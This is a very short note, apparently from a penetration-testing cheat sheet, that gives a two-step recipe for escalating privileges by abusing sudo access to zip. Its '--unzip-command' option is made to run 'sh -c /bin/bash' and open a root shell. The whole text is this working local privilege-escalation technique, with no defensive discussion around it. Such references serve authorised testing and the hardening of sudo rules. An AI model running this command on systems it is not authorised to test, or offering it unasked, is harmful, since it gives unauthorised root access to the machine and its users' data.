cd /tmp 1)touch a file → touch test.txt 2) sudo zip 1.zip test.txt -T --unzip-command="sh -c /bin/bash" #root
Last updated 2 years ago